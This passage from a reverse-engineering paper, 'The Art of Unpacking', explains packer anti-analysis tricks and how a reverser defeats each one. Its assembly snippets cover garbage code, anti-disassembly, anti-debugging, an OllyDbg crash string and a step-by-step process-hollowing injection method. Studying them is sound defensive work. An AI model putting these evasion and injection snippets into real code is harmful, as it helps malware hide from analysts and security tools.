confuse a reverser. It aims to hide the real purpose of the code, be it a decryption routine or 
anti-reversing routines such as debugger detection. Garbage code adds effectiveness to the 
debugger/breakpoint/patching detection techniques described in this paper by hiding them in 
a mass of unrelated “do nothing” and confusing instructions. Furthermore, effective garbage codes are those that look like legitimate/working code.  
 
Example 
Below is an example decryption routine with several garbage code inserted between the 
relevant instructions:  
0044A21A  JMP SHORT sample.0044A21F 
0044A21C  XOR DWORD PTR SS:[EBP],6E4858D 
0044A223  INT 23 
0044A225  MOV ESI,DWORD PTR SS:[ESP] 
0044A228  MOV EBX,2C322FF0 
0044A22D  LEA EAX,DWORD PTR SS:[EBP+6EE5B321] 
0044A233  LEA ECX,DWORD PTR DS:[ESI+543D583E] 
0044A239  ADD EBP,742C0F15 
0044A23F  ADD DWORD PTR DS:[ESI],3CB3AA25 
0044A245  XOR EDI,7DAC77F3 
0044A24B  CMP EAX,ECX 
0044A24D  MOV EAX,5ACAC514 
0044A252  JMP SHORT sample.0044A257 
0044A254  XOR DWORD PTR SS:[EBP],AAE47425 
0044A25B  PUSH ES 
0044A25C  ADD EBP,5BAC5C22 
0044A262  ADC ECX,3D71198C 
0044A268  SUB ESI,-4 
0044A26B  ADC ECX,3795A210 
0044A271  DEC EDI 
0044A272  MOV EAX,2F57113F 
0044A277  PUSH ECX 
0044A278  POP ECX 
0044A279  LEA EAX,DWORD PTR SS:[EBP+3402713D] 
The Art of Unpacking                                                                                                                     19   
 
  0044A27F  DEC EDI 
0044A280  XOR DWORD PTR DS:[ESI],33B568E3 
0044A286  LEA EBX,DWORD PTR DS:[EDI+57DEFEE2] 
0044A28C  DEC EDI 
0044A28D  SUB EBX,7ECDAE21 
0044A293  MOV EDI,185C5C6C 
0044A298  MOV EAX,4713E635 
0044A29D  MOV EAX,4 
0044A2A2  ADD ESI,EAX 
0044A2A4  MOV ECX,1010272F 
0044A2A9  MOV ECX,7A49B614 
0044A2AE  CMP EAX,ECX 
0044A2B0  NOT DWORD PTR DS:[ESI] 
 
The only relevant decryption instructions in the example were:  
0044A225  MOV ESI,DWORD PTR SS:[ESP] 
0044A23F  ADD DWORD PTR DS:[ESI],3CB3AA25 
0044A268  SUB ESI,-4 
0044A280  XOR DWORD PTR DS:[ESI],33B568E3 
0044A29D  MOV EAX,4 
0044A2A2  ADD ESI,EAX 
0044A2B0  NOT DWORD PTR DS:[ESI] 
 
Code Permutation. Code permutation is another technique used by more advanced packers. 
With code permutation, simple instructions are translated into a more complex series of 
instructions. This requires the packer to understand the instructions and generate new series 
of instructions that performs the equivalent operation.  
 A simple permutation example would be the following instructions: 
 
    mov     eax,ebx 
    test    eax,eax 
 Being translated into the following equivalent instructions: 
 
    push    ebx 
    pop     eax 
    or      eax,eax 
 Combined with garbage code, permutated code is an effective technique to slow down a 
reverser from understanding a protected code.  
 
Example 
To illustrate, below is an example of a debugger detection routine which had been permutated and garbage codes inserted in between the permutated instructions: 
 
004018A3  MOV EBX,A104B3FA 
004018A8  MOV ECX,A104B412 
004018AD  PUSH 004018C1 
004018B2  RETN 
004018B3  SHR EDX,5 
004018B6  ADD ESI,EDX 
004018B8  JMP SHORT 004018BA 
004018BA  XOR EDX,EDX 
004018BC  MOV EAX,DWORD PTR DS:[ESI] 
004018BE  STC 
004018BF  JB SHORT 004018DE 
004018C1  SUB ECX,EBX 
004018C3  MOV EDX,9A01AB1F 
004018C8  MOV ESI,DWORD PTR FS:[ECX] 
004018CB  LEA ECX,DWORD PTR DS:[EDX+FFFF7FF7] 
004018D1  MOV EDX,600 
004018D6  TEST ECX,2B73 
004018DC  JMP SHORT 004018B3 
The Art of Unpacking                                                                                                                     20   
 
  004018DE  MOV ESI,EAX 
004018E0  MOV EAX,A35ABDE4 
004018E5  MOV ECX,FAD1203A 
004018EA  MOV EBX,51AD5EF2 
004018EF  DIV EBX 
004018F1  ADD BX,44A5 
004018F6  ADD ESI,EAX 
004018F8  MOVZX EDI,BYTE PTR DS:[ESI] 
004018FB  OR EDI,EDI 
004018FD  JNZ SHORT 00401906 
 
The example shown is just a simple debugger detection routine: 
 
00401081  MOV EAX,DWORD PTR FS:[18] 
00401087  MOV EAX,DWORD PTR DS:[EAX+30] 
0040108A  MOVZX EAX,BYTE PTR DS:[EAX+2] 
0040108E  TEST EAX,EAX 
00401090  JNZ SHORT 00401099 
 
Solution 
Garbage codes and permutated instructions are ways to bore and waste the reverser’s time. 
Thus, it is important to know if the hidden instructions between these obscuring techniques 
are worth understanding (eg: just performing decryption, packer initialization etc).  
 One way to avoid tracing thru the obscured instructions is to try setting breakpoints on APIs 
which packers mostly used (eg: VirtualAlloc/VirtualProtect/LoadLibrary/GetProcAddress, etc.) 
or an API logging tool can also be used, and then treat these APIs as “ trace markers”  in a 
packer trace. If something went wrong (such as the debugger or breakpoints being detected) 
in between these trace markers, then it is the time to do a detailed trace of the code. 
Additionally, setting on-access/write breakpoints allows a reverser to pinpoint what 
instructions are trying to modify/access interesting parts of the protected process instead of tracing thru a mass of code that eventually (and hopefully) lead to the exact routine. 
 
Finally, running OllyDbg in VMWare and routinely taking snapshots of the debugging session 
allows the reverser to go back on a specific trace state. And if something went wrong, the 
tracing session can be reverted back to a specific trace state. 
4.3.  Anti-Disassembly 
 
Another way to confuse the reverser is to obfuscate the disassembly. Anti-disassembly is an 
effective way to complicate the process of understanding the binary via static analysis, and if 
combined with garbage code and permutation, makes it even more effective. 
 
One example of an anti-disassembly technique is to insert a garbage byte and then add a 
conditional branch which will transfer execution to the garbage byte; however, the condition for the conditional branch will always be FALSE. Thus, the garbage byte will never be executed 
but will trick disassemblers to start disassembling the garbage byte address, which eventually 
will lead to an incorrect disassembly output. 
 
Example 
Here is an example of the simple PEB.BeingDebugged flag check with some anti-disassembly 
code added. The highlighted lines are the main instructions, while the remaining are the anti-disassembly codes. It uses the garbage byte 0xff and adds fake conditional jump into the 
garbage byte for disassemblers to follow: 
 
    ;Anti-disassembly sequence #1 
    push    .jmp_real_01 
    stc 
    jnc     .jmp_fake_01   
    retn 
.jmp_fake_01: 
The Art of Unpacking                                                                                                                     21   
 
      db      0xff       
.jmp_real_01: 
    ;-------------------------- 
    mov     eax,dword [fs:0x18] 
         
    ;Anti-disassembly sequence #2 
    push    .jmp_real_02 
    clc 
    jc      .jmp_fake_02 
    retn 
.jmp_fake_02: 
    db      0xff 
.jmp_real_02: 
    ;-------------------------- 
    mov     eax,dword [eax+0x30] 
    movzx   eax,byte [eax+0x02] 
    test    eax,eax 
    jnz     .debugger_found 
 
 
Below is the disassembly output in WinDbg: 
 
0040194a 6854194000       push    0x401954 
0040194f f9               stc 
00401950 7301             jnb     image00400000+0x1953 (00401953) 
00401952 c3               ret 
00401953 ff64a118         jmp     dword ptr [ecx+0x18] 
00401957 0000             add     [eax],al 
00401959 006864           add     [eax+0x64],ch 
0040195c 194000           sbb     [eax],eax 
0040195f f8               clc 
00401960 7201             jb      image00400000+0x1963 (00401963) 
00401962 c3               ret 
00401963 ff8b40300fb6     dec     dword ptr [ebx+0xb60f3040] 
00401969 40               inc     eax 
0040196a 0285c0750731     add     al,[ebp+0x310775c0] 
 
And the disassembly output in OllyDbg: 
 
0040194A   68 54194000      PUSH 00401954 
0040194F   F9               STC 
00401950   73 01            JNB SHORT 00401953 
00401952   C3               RETN 
00401953   FF64A1 18        JMP DWORD PTR DS:[ECX+18] 
00401957   0000             ADD BYTE PTR DS:[EAX],AL 
00401959   0068 64          ADD BYTE PTR DS:[EAX+64],CH 
0040195C   1940 00          SBB DWORD PTR DS:[EAX],EAX 
0040195F   F8               CLC 
00401960   72 01            JB SHORT 00401963 
00401962   C3               RETN 
00401963   FF8B 40300FB6    DEC DWORD PTR DS:[EBX+B60F3040] 
00401969   40               INC EAX 
0040196A   0285 C0750731    ADD AL,BYTE PTR SS:[EBP+310775C0] 
 
And finally, the disassembly output in IDAPro:  
0040194A            push    (offset loc_401953+1) 
0040194F            stc 
00401950            jnb     short loc_401953 
00401952            retn 
00401953 ; -------------------------------------------------------------- 
00401953 
00401953 loc_401953:                        ; CODE XREF: sub_401946+A 
00401953                                    ; DATA XREF: sub_401946+4 
00401953            jmp     dword ptr [ecx+18h] 
00401953 sub_401946 endp 
00401953 
00401953 ; -------------------------------------------------------------- 
The Art of Unpacking                                                                                                                     22   
 
  00401957            db    0 
00401958            db    0 
00401959            db    0 
0040195A            db  68h ; h 
0040195B            dd offset unk_401964 
0040195F            db 0F8h ; ° 
00401960            db  72h ; r 
00401961            db    1 
00401962            db 0C3h ; + 
00401963            db 0FFh 
00401964 unk_401964 db  8Bh ; ï             ; DATA XREF: text:0040195B 
00401965            db  40h ; @ 
00401966            db  30h ; 0 
00401967            db  0Fh 
00401968            db 0B6h ;  
00401969            db  40h ; @ 
0040196A            db    2 
0040196B            db  85h ; à 
0040196C            db 0C0h ; + 
0040196D            db  75h ; u 
 
Notice how all three disassemblers/debuggers had fallen into the anti-disassembly trick, which 
is very annoying and confusing to a reverser analyzing the disassembly. There are several other ways to confuse disassemblers, and the illustration was just one example. Additionally, 
these anti-disassembly codes can be coded in a macro so that the assembly source is cleaner.  
 
The reader is advised to refer to an excellent reversing book by Eldad Eliam
13 which contains 
detailed information about anti-disassembly techniques and other reversing topics. 
 
5. TECHNIQUES : DEBUGGER ATTACKS 
 
This section enumerates techniques that packers use to actively attack the debugger in such a 
way that execution will suddenly stop if the process is being debugged, breakpoints are 
disabled, etc. Similar to the previously described techniques, these techniques can be made 
more effective if they are hidden using anti-analysis techniques. 
5.1.  Misdirection and Stopping Execution via Exceptions  
 
Tracing thru the code in a linear manner allows a reverser to easily understand and grasp the 
purpose of the code. Thus, some packers employ several techniques so that tracing the code 
is not linear and time consuming.  
 One commonly used technique is to throw several exceptions in the process of unpacking. By 
throwing caught exceptions, the reverser will need to understand where EIP will be pointing to 
upon exception, and where the EIP will be pointing after the exception handler had executed.  
 
Additionally, exceptions are a way for packers to repeatedly stop execution of the unpacking 
code. Because when exceptions are thrown and the process is under a debugger, the 
debugger temporarily stops execution of the unpacking code.  
Packers commonly use the Structured Exception Handling (SEH)
14 as a mechanism for 
exception handling. However, newer packers also started to use Vectored Exceptions15. 
 
Example 
                                                
13 See Reversing: Secrects of Reverse Engineering in the reference section 
14 See http://www.microsoft.com/msj/0197/exception/exception.aspx  for in-depth information about SEH 
15 See http://msdn.microsoft.com/msdnmag/issues/01/09/hood/  for an in-depth information about 
Vectored Exceptions  
The Art of Unpacking                                                                                                                     23   
 
  
Below is an example code that performs misdirection by throwing an overflow exception (via 
INTO) when the overflow flag is set by the ROL instruction after loop iteration. But since an 
overflow exception is a trap exception, EIP will just point to the JMP instruction. If the reverser 
is using OllyDbg, and the reverser did not pass the exception to the exception handler (via 
Shift+F7/F8/F9) and just continually performs a step, the reverser will be tracing an endless 
loop. 
 
    ; set up exception handler 
    push    .exception_handler 
    push    dword [fs:0] 
    mov     [fs:0], esp 
     
    ; throw an exception 
    mov     ecx,1 
.loop: 
    rol     ecx,1 
    into     
    jmp     .loop     
     
    ; restore exception handler 
    pop     dword [fs:0] 
    add     esp,4 
    :::     
         
.exception_handler 
    ;EAX = CONTEXT record 
    mov     eax,[esp+0xc]                 
    ;set Context.EIP upon return 
    add     dword [eax+0xb8],2 
    xor     eax,eax 
    retn 
 Packers commonly throw access violations (0xC0000005), breakpoint (0x80000003) and 
single step (0x80000004) exceptions. 
 
Solution For packers which uses caught 
exceptions for no other reason than 
transferring execution to different parts 
of the code, OllyDbg can be configured 
so that exceptions are automatically passed to exceptions handlers. This 
feature can be configured via Options -> 
Debugging Options -> Exceptions. On 
the right side is a screen shot of the 
configuration dialog for handling 
exceptions. A reverser can also add 
custom exceptions if the exception is not one of those that can be selected via a 
checkbox. 
 
For packers which performs important 
operations inside an exception handler. The reverser can set a breakpoint in the exception 
handler in which the address can be viewed in OllyDbg using View->SEH Chain. Then, 
pressing Shift+F7/F8/F9 to transfer control to the exception handler. 
5.2.  Blocking Input 
 
To prevent a reverser from controlling the debugger, a packer can use the 
user32!BlockInput() API to block keyboard and mouse input while the main unpacking routine 
is being executed. Hidden within garbage codes and anti-disassembly techniques, this can be 
The Art of Unpacking                                                                                                                     24   
 
  effective if not identified by the reverser. If executed, the system will appear to be 
unresponsive, leaving the reverser baffled.  
 
A typical example would be a reverser setting a breakpoint inside GetProcAddress(), then 
running the unpacking code until the breakpoint is hit. However, in the process of skipping 
several garbage codes, the packer had called BlockInput(). And once the GetProcAddress() 
breakpoint is hit, the reverser suddenly cannot control the debugger leaving him perplexed on 
what just happened.  
Example 
BlockInput() takes 1 boolean parameter fBlockIt. If true, keyboard and mouse events are 
blocked, if false, keyboard and mouse events are unblocked: 
 
    ; Block input 
    push    TRUE 
    call    [BlockInput] 
     
    ; ...Unpacking code... 
     
    ; Unblock input     
    push    FALSE 
    call    [BlockInput] 
 
Solution 
F o r t u n a t e l y ,  t h e  s i m p l e  s o l u t i o n  t o  p a t c h  B l o c k I n p u t ( )  t o  j u s t  p e r f o r m  a  R E T N .  H e r e ’ s  t h e  ollyscript to patch the entry of user32!BlockInput(): 
 
    gpa   "BlockInput", "user32.dll" 
    mov   [$RESULT], #C20400#   //retn 4 
 The Olly Advanced plugin also has the option to patch BlockInput().  Additionally, pressing 
CTRL+ALT+DELETE will allow the user to unblock input manually. 
5.3.  ThreadHideFromDebugger 
 
This technique uses the API ntdll!NtSetInformationThread() which is usually used for setting a 
thread’s priority. However, the said API can also be used to prevent debugging events to be 
sent to the debugger. 
 
The parameters to NtSetInformationThread() are shown below. To perform this technique, 
TheadHideFromDebugger (0x11) is passed as the ThreadInformationClass parameter, ThreadHandle is usually set to the current thread handle (0xfffffffe): 
 
NTSTATUS NTAPI NtSetInformationThread( 
   HANDLE ThreadHandle,  
   THREAD_INFORMATION_CLASS ThreadInformationClass,  
   PVOID ThreadInformation,  
   ULONG ThreadInformationLength  
); 
 Internally, ThreadHideFromDebugger will set the HideThreadFromDebugger field of the 
ETHREAD
16 kernel structure. Once set, the internal kernel function DbgkpSendApiMessage(), 
whose main purpose is to send events to the debugger is never invoked. 
 Example 
A typical example of a call to the NtSetInformationThread() would be: 
 
    push    0                           ;InformationLength 
    push    NULL                        ;ThreadInformation 
                                                
16 Data type of the ETHREAD structure is _ETHREAD 
The Art of Unpacking                                                                                                                     25   
 
      push    ThreadHideFromDebugger      ;0x11         
    push    0xfffffffe                  ;GetCurrentThread() 
    call    [NtSetInformationThread]         
 
Solution 
A breakpoint can be set in ntdll!NtSetInformationThread(), and once hit, the reverser can manipulate the EIP to the prevent the API call from reaching the kernel. This can also be done 
automatically via an ollyscript. Additionally, the Olly Advanced plugin has the option to patch 
this API so that if the ThreadInformationClass parameter is set to HideThreadFromDebugger, it 
will just perform a return instead of calling the kernel code. 
5.4.  Disabling Breakpoints 
 
Another way to attack the debugger is by disabling breakpoints. To disable hardware 
breakpoints, a packer will modify the debug registers via the CONTEXT structure.   
Example 
In this example, the debug registers are cleared via the CONTEXT record passed to the 
exception handler: 
 
    ; set up exception handler 
    push    .exception_handler 
    push    dword [fs:0] 
    mov     [fs:0], esp 
     
    ; throw an exception 
    xor     eax,eax             
    mov     dword [eax],0    
     
    ; restore exception handler 
    pop     dword [fs:0] 
    add     esp,4 
    ::: 
             
.exception_handler 
    ;EAX = CONTEXT record 
    mov     eax,[esp+0xc]     
     
    ;Clear Debug Registers: Context.Dr0-Dr3,Dr6,Dr7 
    mov     dword [eax+0x04],0 
    mov     dword [eax+0x08],0 
    mov     dword [eax+0x0c],0 
    mov     dword [eax+0x10],0 
    mov     dword [eax+0x14],0 
    mov     dword [eax+0x18],0 
         
    ;set Context.EIP upon return 
    add     dword [eax+0xb8],6 
    xor     eax,eax 
    retn 
 
On the other hand, with software breakpoints, the packer can just search for INT3s (0xCC) 
and replace them with an arbitrary/random opcode; by doing this, the breakpoint will be disabled and the original instruction is corrupted. 
 
Solution 
Clearly, if hardware breakpoints are being detected, software breakpoints can be used, vice 
versa. If both are being detected, try using the on-memory access/write breakpoints feature 
of OllyDbg. 
  
The Art of Unpacking                                                                                                                     26   
 
  5.5.  Unhandled Exception Filter 
 
The MSDN documentation states that if an exception reaches unhandled exception filter 
(kernel32!UnhandledExceptionFilter), and that the application is not being debugged, the 
unhandled exception filter will call the top level exception filter specified as parameter in the 
kernel32!SetUnhandledExceptionFilter() API. Packers take advantage of this by setting up an 
exception filter and then throwing an exception, the exception will just be received by the debugger as a second chance exception if it is being debugged, otherwise, control is 
transferred into the exception filter and execution can continue. 
 
Example 
Below is an example in which an top level exception filter is set using 
SetUnhandledExceptionFilter(), and then an access violation is thrown. If the process is being 
debugged, the debugger will just receive a second chance exception; otherwise, the exception filter will setup CONTEXT.EIP and continue the execution.  
 
    ;set the exception filter 
    push    .exception_filter 
    call    [SetUnhandledExceptionFilter] 
    mov     [.original_filter],eax 
 
    ;throw an exception 
    xor     eax,eax     
    mov     dword [eax],0    
 
    ;restore exception filter 
    push    dword [.original_filter] 
    call    [SetUnhandledExceptionFilter] 
 
    ::: 
       
.exception_filter: 
    ;EAX = ExceptionInfo.ContextRecord 
    mov     eax,[esp+4] 
    mov     eax,[eax+4] 
 
    ;set return EIP upon return 
    add     dword [eax+0xb8],6 
 
    ;return EXCEPTION_CONTINUE_EXECUTION 
    mov     eax,0xffffffff 
    retn     
 
Some packers also manually set up the exception filter by setting kernel32! 
_BasepCurrentTopLevelFilter directly instead of calling SetUnhandledExceptionFilter(), this is 
in case the reverser sets a breakpoint on the said API. 
 
Solution 
Interestingly, the code inside kernel32!UnhandledExceptionFilter() uses 
ntdll!NtQueryInformationProcess (ProcessDebugPort) to determine if the process is being debugged, which it will then use to decide whether to call the registered exception filter or not. 
Thus, the solution is the same solution as the DebugPort debugger detection technique. 
5.6.  OllyDbg: OutputDebugString() Format String Bug 
 
T h is  d e bu gg e r  a t t ac k  is  s pe c if i c  to  O l ly Db g.  O ll y Db g i s  k now n  to  b e  vu ln e r ab l e  to  a  f o rm at 
string bug which can cause it to crash or execute arbitrary code, the bug is triggered by an improper string parameter passed to kernel32!OutputDebugString(). This bug exists in the 
current version of OllyDbg (1.10) and still not patched.  
 
Example 
This simple example causes OllyDbg to throw an access violation or unexpectedly terminate: 
The Art of Unpacking                                                                                                                     27   
 
  
    push    .szFormatString 
    call    [OutputDebugStringA] 
    :::     
.szFormatString db  "%s%s",0 
 
Solution 
The solution involves patching the entry of kernel32!OutputDebugStringA() so it will just 
perform a RETN. 
6. TECHNIQUES : ADVANCED AND OTHER TECHNIQUES 
 
This section enumerates advanced and other techniques that do not fall in the previous anti-
reversing categories.  
6.1.  Process Injection 
 
Process injection has become a feature of some packers. With this feature, the unpacking stub 
spawns a selected host process (e.g.: itself, explorer.exe, iexplorer.exe, etc.) and then inject the unpacked executable into the host process. 
 
 
On the right side is a screen shot of a packer that 
supports process injection. 
 
Malcodes use this packer feature to allow them to 
bypass some firewalls that checks if the process is in 
the list of allowed applications to perform external network connections. 
 
 
One method that packers use to perform process injection is as follows:  
1. Spawn the host process as a suspended child process. This is done using the 
CREATE_SUSPENDED process creation flag passed to kernel32!CreateProcess(). At 
this point an initialization thread is created and suspended, DLLs are still not 
loaded since the loader routine (ntdll!LrdInitializeThunk) is still not called. The 
context of the said thread is setup such as the register values contains information 
such as the PEB address, and entry point of the host process. 
 
2. Using kernel32!GetThreadContext(), the context of the child process’ initialization 
thread is retrieved 
 
3. The PEB address of the child process is retrieved via CONTEXT.EBX 
 
4. The image base of the child process is retrieved by reading PEB.ImageBase (PEB + 
0x8) 
 
The Art of Unpacking                                                                                                                     28   
 
  5. The original host image in the child process is then unmapped using 
ntdll!NtUnmapViewOfSection() with the BaseAddress parameter pointing to the 
retrieved image base 
 
6. The unpacking stub will then allocate memory inside the child process using 
kernel32!VirtualAllocEx() with dwSize parameter equal to the image size of the 
unpacked executable. 
 7. Using kernel32!WriteProcessMemory(), the PE header and each of the sections of 
the unpacked executable is written to the child process. 
 
8. The PEB.ImageBase of the child process is then updated to match the image base 
of the unpacked executable. 
 
9. The context of the child process’ initialization thread is then updated via 
kernel32!SetThreadContext() in which CONTEXT.EAX is set to the entry point of 
the unpacked executable. 
 
10. Execution of the child process is resumed via kernel32!ResumeThread() 
 
In order to debug the spawned child process beginning from its entry point, the reverser can 
set a breakpoint in WriteProcessMemory() and when the section containing the entry point is about to be written to the child process, the entry point code is patched with a “jump to self” 
instruction (0xEB 0xFE). When the main thread of the child process is resumed, the child 
process will enter an endless loop in its entry point. Then, at that point, the reverser can 
attach a debugger in the child process, restore the modified instructions, and continue normal 
debugging. 
6.2.  Debugger Blocker  
 
A featured that had been introduced by the Armadillo packer is called the Debugger Blocker. 
This prevents a reverser from attaching a debugger to a protected process. This protection is 
implemented thru the use of debugging functions provided by Windows.  
 
Specifically, the unpacking stub acts a debugger (parent process) where it spawns and 
debugs/controls the child process which contains the unpacked executable.  
 
 
Since the protected process is already being debugged, attaching a debugger via 
kernel32!DebugActiveProcess() will fail since the corresponding native API, 
ntdll!NtDebugActiveProcess() will return STATUS_PORT_ALREADY_SET. Internally, the failure of NtDebugActiveProcess() is due to the DebugPort field of the EPROCESS kernel structure 
being already set. 
 
In order to attach a debugger to the protected process, a solution posted on several reversing 
forums involves invoking kernel32!DebugActiveProcessStop() in the context of the parent 
process. This can be done by attaching a debugger on the parent process, and setting a 
breakpoint inside kernel32!WaitForDebugEvent(), once the breakpoint is hit, a code to invoke DebugActiveProcessStop(ChildProcessPID) is then injected and executed, once the call 
succeeds, a debugger can be attached to the protected process.  
The Art of Unpacking                                                                                                                     29   
 
  
6.3.  TLS Callbacks 
 
Another technique used by packers is to execute code before the actual entry point is 
executed. This is achieved thru the use Thread Local Storage (TLS) callback functions. Packers 
may perform its debugger detection and decryption routines via these callback functions so 
that the reverser will not be able to trace these routines. 
 TLS callbacks can be identified using PE file parsing tools such as pedump. With pedump, the 
Data Directory entries will display if a TLS directory exists in the executable: 
 
Data Directory 
  EXPORT           rva: 00000000  size: 00000000 
  IMPORT           rva: 00061000  size: 000000E0 
  ::: 
  TLS              rva: 000610E0  size: 00000018 
  ::: 
  IAT              rva: 00000000  size: 00000000 
  DELAY_IMPORT     rva: 00000000  size: 00000000 
  COM_DESCRPTR     rva: 00000000  size: 00000000 
  unused           rva: 00000000  size: 00000000 
 
Then, the actual contents TLS directory is displayed. The AddressOfCallBacks field points to an array of callback functions and is null-terminated: 
 
TLS directory: 
  StartAddressOfRawData: 00000000 
  EndAddressOfRawData:   00000000 
  AddressOfIndex:        004610F8 
  AddressOfCallBacks:    004610FC 
  SizeOfZeroFill:        00000000 
  Characteristics:       00000000 
 
In this example, RVA 0x4610fc points to the callback function pointers (0x490f43 and 0x44654e): 
 
 
By default, OllyDbg will load the sample then pause at the entry point. Since TLS callbacks are 
called before the actual entry point, OllyDbg should be configured so that that it will break on the actual loader and before the TLS callbacks are called.  
 
Breaking on the actual loader 
code inside ntdll.dll can be set by 
selecting Options -> Debugging 
Options -> Events -> Make first 
pause at -> System breakpoint.  
Once set, OllyDbg will break 
inside ntdll! _LdrpInitialize-
Process() which is just before 
ntdll!_LdrpRunInitializeRoutines() executes the TLS callbacks. Once set, breakpoints can be 
set on the callback routines and then traced.  
More information about the PE file format including the binary/source for pedump can be 
found on the following links: 
 
The Art of Unpacking                                                                                                                     30   
 
  An In-Depth Look into the Win32 Portable Executable File Format by Matt Pietrek 
http://msdn.microsoft.com/msdnmag/issues/02/02/PE/default.aspx  
An In-Depth Look into the Win32 Portable Executable File Format, Part 2 by Matt Pietrek 
http://msdn.microsoft.com/msdnmag/issues/02/03/PE2/  
 
A latest version of the PE file format from Microsoft can be found on the following link: 
 
Microsoft Portable Executable and Common Object File Format Specification http://www.microsoft.com/whdc/system/platform/firmware/PECOFF.mspx
 
6.4.  Stolen Bytes  
 
Stolen bytes are basically portions of codes of the protected executable (usually few 
instructions of the entry point) which are removed by the packer and is copied and executed 
from an allocated memory. This protects the executable in a way that if the protected process is dumped from memory, instructions that had been stolen are not recovered. 
 
Here is an example of an executable’s original entry point: 
 
004011CB  MOV EAX,DWORD PTR FS:[0] 
004011D1  PUSH EBP 
004011D2  MOV EBP,ESP 
004011D4  PUSH -1 
004011D6  PUSH 0047401C 
004011DB  PUSH 0040109A 
004011E0  PUSH EAX 
004011E1  MOV DWORD PTR FS:[0],ESP 
004011E8  SUB ESP,10 
004011EB  PUSH EBX 
004011EC  PUSH ESI 
004011ED  PUSH EDI 
 
And below is the same sample with the first two instructions stolen by the Enigma Protector packer: 
 
004011CB  POP EBX 
004011CC  CMP EBX,EBX 
004011CE  DEC ESP 
004011CF  POP ES               
004011D0  JECXZ SHORT 00401169 
004011D2  MOV EBP,ESP 
004011D4  PUSH -1 
004011D6  PUSH 0047401C 
004011DB  PUSH 0040109A 
004011E0  PUSH EAX 
004011E1  MOV DWORD PTR FS:[0],ESP 
004011E8  SUB ESP,10 
004011EB  PUSH EBX 
004011EC  PUSH ESI 
004011ED  PUSH EDI 
 
This is the sample example in which the several instructions had been stolen by the ASProtect 
packer. It added a jump instruction to a routine which executes the stolen instructions. The stolen instructions are then intertwined with garbage code to make it harder to restore the 
stolen instructions. 
 
004011CB  JMP 00B70361 
004011D0  JNO SHORT 00401198               
004011D3  INC EBX 
004011D4  ADC AL,0B3 
004011D6  JL SHORT 00401196 
004011D8  INT1 
004011D9  LAHF 
004011DA  PUSHFD 
The Art of Unpacking                                                                                                                     31   
 
  004011DB  MOV EBX,1D0F0294 
004011E0  PUSH ES 
004011E1  MOV EBX,A732F973 
004011E6  ADC BYTE PTR DS:[EDX-E],CH 
004011E9  MOV ECX,EBP 
004011EB  DAS 
004011EC  DAA 
004011ED  AND DWORD PTR DS:[EBX+58BA76D7],ECX 
6.5.  API Redirection 
 
API redirection is a way to prevent a reverser from easily rebuilding the import table of the 
protected executable. Typically, the original import table is destroyed and calls to APIs are 
redirected into routines located into an allocated memory, these routines are then responsible 
for calling the actual API.   
In this example, the code calls the API kernel32!CopyFileA(): 
 
00404F05  LEA EDI,DWORD PTR SS:[EBP-20C]            
00404F0B  PUSH EDI                                   
00404F0C  PUSH DWORD PTR SS:[EBP-210]               
00404F12  CALL <JMP.&KERNEL32.CopyFileA>            
 
The call was to a stub that performs a JMP in which the address is referenced from the import 
table:  
004056B8  JMP DWORD PTR DS:[<&KERNEL32.CopyFileA>] 
 However, when the ASProtect redirected the kernel32!CopyFileA() API, the stub was replaced by a CALL to a routine in an allocated memory which eventually leads to execution of stolen 
instructions from kernel32!CopyFileA(): 
 
004056B8  CALL 00D90000 
 Below is an illustration on how the stolen instructions are placed. The first 7 instructions of the kernel!CopyFileA() code had been copied. Additionally, the code in which the call instruction at 
0x7C83005E points to had also been copied. Then, control is transferred back inside 
kernel32.dll in the middle of the kernel32!CopyFileA() routine via a RETN to 0x7C830063: 
 
00D80003  MOV EDI,EDI
00D80005  PUSH EBP
00D80006  MOV EBP,ESP00D80008  PUSH ECX00D80009  PUSH ECX00D8000A  PUSH ESI
00D8000B  PUSH DWORD PTR SS:[ EBP+8]
00D8000E  JMP SHORT 00D80013                       00D80011  INT 2000D80013  PUSH 7C830063 ;return EIP
00D80018  MOV EDI,EDI
00D8001A  PUSH EBP
00D8001B  MOV EBP,ESP00D8001D  PUSH ECX00D8001E  PUSH ECX00D8001F  PUSH ESI
00D80020  MOV EAX,DWORD PTR FS :[18]
00D80026  PUSH DWORD PTR SS:[ EBP+8]
00D80029  LEA ESI,DWORD PTR DS :[ EAX+BF8]
00D8002F  LEA EAX,DWORD PTR SS:[EBP-8]
00D80032  PUSH EAX
00D80033  PUSH 7C80E2BF
00D80038  RETN7C830053  MOV EDI,EDI7C830055  PUSH EBP
7C830056  MOV EBP,ESP7C830058  PUSH ECX7C830059  PUSH ECX7C83005A  PUSH ESI
7C83005B  PUSH DWORD PTR SS:[ EBP+8]
7C83005E  CALL kernel32.7C80E2A47C830063  MOV ESI,EAX7C830065  TEST ESI,ESI7C830067  JE SHORT kernel32.7C8300A6Stolen instructions from kernel 32!CopyFileA
Actual kernel32!CopyFileA code
 
 
The Art of Unpacking                                                                                                                     32   
 
  Some packers also go as far as loading the whole DLL image in an allocated memory and then 
redirecting API calls into these DLL image copies. This technique effectively makes it difficult 
to set breakpoints in the actual APIs. 
 
6.6.  Multi-Threaded Packers 
 
With multi-threaded packers, another thread is usually spawned to perform some required operation such as decrypting the protected executable. With multi-thread packers, complexity 
is added and the difficulty of understanding the code increases since tracing the code gets 
complicated. 
 
One example of a multi-threaded packer is PECrypt, it uses a second thread to perform 
decryption of a data that had been fetched by the main thread, and these threads are 
synchronized using event objects.   
PECrypt operates and synchronizes its threads as follows: 
 
Thread 1
Fetch DataThread 2
Decrypt DataSignalThread 1
Store DataSignal
 
6.7.  Virtual Machines 
 
The concept of using virtual machines is simple: a reverser will eventually figure out how to 
bypass/solve anti-debugging and anti-reversing techniques and that eventually, the protected 
executable needs to be decrypted and executed in memory leaving it vulnerable to static 
analysis.  
 
With the advent of virtual machines, protected parts of the code are translated into p-codes 
which are then translated into machine code for execution. Thus, the original machine instructions are replaced and the complexity of understanding what the code does 
exponentially increases.  
 
Below is a fairly simple illustration of the concept: 
 
Protected 
Code
(x86)Protected 
Code
(P-code)Convertx86 
instructionsExecute TranslateVirtual 
MachineProtected Executable
 
 
Modern packers such as Oreans technologies’ CodeVirtualizer and StarForce apply the concept 
of virtual machines to protect executables. 
 
The solution for virtual machines, though not simple, is to analyze how the p-code is 
structured and translated by the virtual machine. And with the obtained information, a 
disassembler which will parse the p-code and translate them into machine code or understandable instructions can be developed. 
The Art of Unpacking                                                                                                                     33   
 
   
An example of developing a p-code disassembler and detailed information about 
implementation of virtual machines can be found on the following link: 
 
